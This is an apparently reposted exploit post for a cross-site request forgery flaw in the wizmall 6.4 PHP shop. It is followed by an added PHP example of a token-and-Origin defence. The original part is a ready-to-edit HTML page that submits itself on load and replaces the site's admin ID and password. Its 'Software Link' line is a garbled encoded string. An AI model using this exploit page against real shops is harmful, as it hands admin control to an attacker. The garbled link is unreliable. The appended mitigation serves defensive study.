[Repost] wizmall 6.4 CSRF Vulnerabilities
Posted: 2010-8-11 12:20 1845
# Exploit Title: wizmall 6.4 CSRF Vulnerabilities
# Date: 08/10/2010
# Author: pyw1414 <i2SEC>
# Software Link: 2efK9s2c8@1M7q4)9K6b7g2)9J5c8W2)9J5c8Y4N6%4N6#2)9J5k6i4y4Z5L8%4m8Q4x3X3c8%4K9i4A6Q4x3X3g2U0L8$3#2Q4x3V1k6T1L8$3q4J5k6q4)9J5c8X3#2S2K9h3&6Q4x3V1k6$3K9h3g2%4i4K6u0r3M7X3!0G2N6q4)9J5c8Y4N6A6P5X3#2S2L8r3H3H3x3g2)9J5c8U0p5#2z5g2)9J5c8U0m8Q4x3U0k6F1j5Y4y4H3i4K6y4n7i4K6t1$3L8X3u0K6M7q4)9K6b7R3`.`.
# Version: 6.4 UTF-8 For php
# Tested on: XP SP3
-=[ CSRF Exploit - Change Admin ID/PW ]=-

<html>
<head>
<title>Wizmall 6.4 UTF-8 For php CSRF Vulnerabilities - Change Admin Id/Password</title>
</head>
<body onload="document.csrf.submit();">
<form name="csrf" action="http://[domain]/malladmin/main.php" method="POST">
  <!--- Edit these --->
  <input type="hidden" name="ID" value="i2sec" />
  <input type="hidden" name="PASS" value="test1234" />
  <input type="hidden" name="PASS1" value="test1234" />
  <!--- Do not edit below --->
  <input type="hidden" name="menushow" value="menu1" />
  <input type="hidden" name="theme" value="basicconfig/basic_info2" />
  <input type="hidden" name="action" value="admin_save" />
  <input type="hidden" name="ADMIN_NAME" value="pyw1414" />
  <input type="hidden" name="ADMIN_TITLE" value="i2Sec+Plaza" />
  <input type="hidden" name="ADMIN_TITLE_E" value="" />
  <input type="hidden" name="COMPANY_DOMAIN" value="" />
  <input type="hidden" name="str_watermark" value="" />
  <input type="hidden" name="img_watermark" value="" />
  <input type="hidden" name="HOME_URL" value="" />
  <input type="hidden" name="ADMIN_EMAIL" value="ii@i2sec.co.kr" />
  <input type="hidden" name="ADMIN_TEL" value="" />
  <input type="hidden" name="COMPANY_NAME" value="i2Sec" />
  <input type="hidden" name="PRESIDENT" value="" />
  <input type="hidden" name="COMPANY_NUM" value="" />
  <input type="hidden" name="COMPLICENCE_NUM" value="" />
  <input type="hidden" name="CUSTOMER_TEL" value="" />
  <input type="hidden" name="CUSTOMER_FAX" value="" />
  <input type="hidden" name="COMPANY_ADD" value="" />
  <input type="hidden" name="COMPLICENCE_NUM" value="" />
  <input type="hidden" name="MART_BASEDIR" value="" />
  <input type="hidden" name="SYSTEM_BASEDIR" value="" />
  <input type="hidden" name="smsModule" value="ANYSMS" />
  <input type="hidden" name="sms_id" value="" />
  <input type="hidden" name="sms_pwd" value="" />
</form>
</body>
</html>
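
Every field in the form above is a value an outside page can supply, so an `admin_save` POST to `malladmin/main.php` that arrives with the admin's session cookie is indistinguishable from one the admin made. As an added example (not wizmall's code and not part of the original post; the function names, the `csrf_token` field and the `shop.example` host are assumptions), a per-session token and Origin check that such a handler could run before saving, exercised on a constructed token-less request like the one above and on the admin's own form:

```php
<?php
declare(strict_types=1);
// Added example, not wizmall code; function and field names are hypothetical.

// One unpredictable token per admin session, embedded as a hidden field
// in every admin form that changes state.
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Host part of a Host header or Origin value, without scheme or port.
function host_of(string $value): ?string
{
    $url = strpos($value, '://') === false ? '//' . $value : $value;
    $host = parse_url($url, PHP_URL_HOST);
    return is_string($host) ? strtolower($host) : null;
}

// Gate for state-changing admin actions such as action=admin_save.
function csrf_request_ok(array $session, array $post, array $server): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if (!is_string($supplied) || $expected === '' || !hash_equals($expected, $supplied)) {
        return false; // token missing or wrong; compared in constant time
    }
    if (isset($server['HTTP_ORIGIN'])) { // when the browser sends Origin, it must name this host
        $origin = host_of($server['HTTP_ORIGIN']);
        return $origin !== null && $origin === host_of($server['HTTP_HOST'] ?? '');
    }
    return true;
}

// Constructed requests (sample data, not captured traffic).
$session = [];
$token   = csrf_token($session);
$server  = ['REQUEST_METHOD' => 'POST', 'HTTP_HOST' => 'shop.example', 'HTTP_ORIGIN' => 'http://shop.example'];
$noToken = ['action' => 'admin_save', 'ID' => 'i2sec', 'PASS' => 'test1234', 'PASS1' => 'test1234'];
$ownForm = ['action' => 'admin_save', 'ID' => 'admin', 'csrf_token' => $token];
var_dump(csrf_request_ok($session, $noToken, $server));
var_dump(csrf_request_ok($session, $ownForm, $server));
```

Requiring the current admin password on the credential-change form and setting `SameSite` on the session cookie are complementary controls for the same request.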